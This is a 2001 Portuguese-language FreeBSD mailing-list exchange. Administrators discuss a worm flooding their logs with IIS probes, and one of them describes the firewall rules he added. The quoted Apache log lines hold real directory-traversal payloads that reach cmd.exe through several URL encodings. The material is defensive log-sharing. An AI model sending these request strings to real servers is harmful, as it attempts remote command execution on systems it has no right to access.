[FUGSPBR] Que ótimo.
:: Patrick Tracanelli ::
eeviac em fatectq.com.br
Qua Set 19 01:55:03 BRT 2001
Nossa e eu que (egoista) pensei que soh eu tava sendo vitima disso... comecou faz 2 dias aqui, um monte de IPs fazendo rekizicao em cmd.exe e root.exe... como se neo fosse um saco esses logs e ainda o desperdicio de banda q isso causa, ainda tem a ofensa pessoal de achar q meu freebsd eh um mero nt com IIS...
P.S.: criei regras dinamicas pra por no firewall o povo q faz essas requisicoes, mas em 1 noite deu 23 IPs distintos :( isso impossibilita eu bloquear no roteador e ainda continua consumindo banda... alguem sabe que raio de maldica eh essa? qual o nome da cria? os poucos IPs q tinham reverso eram dominio .cl :/ haja paciencia ricardo hehehe
On Tue, 18 Sep 2001 20:42:50 -0300
Ricardo Ryoiti Sugawara Junior <ricardorsj em uol.com.br> wrote:
> Olá.
>
> Vejam que ótimo. Depois do codered enchendo nossos logs, me parece
>que temos outro worm, que dessa vez pesquisa diversas vulnerabilidades
>do IIS... Não estou preocupado com as falhas, mas acredito que todos
>ficamos de saco cheio de ver esse tipo de coisa nos nossos logs .. :/
>
>
>200.193.137.242 - - [18/Sep/2001:20:38:01 -0300] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 322 (0pct)
>200.193.137.242 - - [18/Sep/2001:20:38:02 -0300] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 322 (0pct)
>200.193.137.242 - - [18/Sep/2001:20:38:02 -0300] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 338 (0pct)
>200.193.137.242 - - [18/Sep/2001:20:38:03 -0300] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 (0pct)
>200.193.137.242 - - [18/Sep/2001:20:38:03 -0300] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 (-pct)
>200.193.137.242 - - [18/Sep/2001:20:38:04 -0300] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 (0pct)
>200.193.137.242 - - [18/Sep/2001:20:38:04 -0300] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 (0pct)
>200.193.137.242 - - [18/Sep/2001:20:38:05 -0300] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 (-pct)
>200.193.137.242 - - [18/Sep/2001:20:38:05 -0300] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 (-pct)
>200.193.137.242 - - [18/Sep/2001:20:38:06 -0300] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
>(0pct)
>200.193.137.242 - - [18/Sep/2001:20:38:06 -0300] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 (0pct)
>
> []'s
> Ricardo.
----
+---------------------------------------------------------------+---------+
| Patrick Leandro Tracanelli do Carmo | ( ) |
| RPGw/IRC Nick -- Eksffa Shyranui Kapwam | (O_O) |
| Eeviac host FreeBSD 5.0-CURRENT Dual SMP @444Mhz | \`-'/ w|
| 4o Ciclo (Fatorial) - Faculdade de Tecnologia de Taquaritinga | ( )__||
|===============================================================| /m`m\ |
| eksffa em fatectq.com.br - Fone: (0xx55) 9972-9465 | FreeBSD |
+---------------------------------------------------------------+---------+
|Administrador de Redes e Sistemas | BSD Unix, System V & Open Source Syst|
+---------------------------------------------------------------+---------+
Long live Hanin Elias, Kim Deal!!!
~
~
----
Para sair da lista envie um e-mail para majordomo em fugspbr.org
com as palavras "unsubscribe fugspbr" no corpo da mensagem.
Mais detalhes sobre a lista de discussão freebsd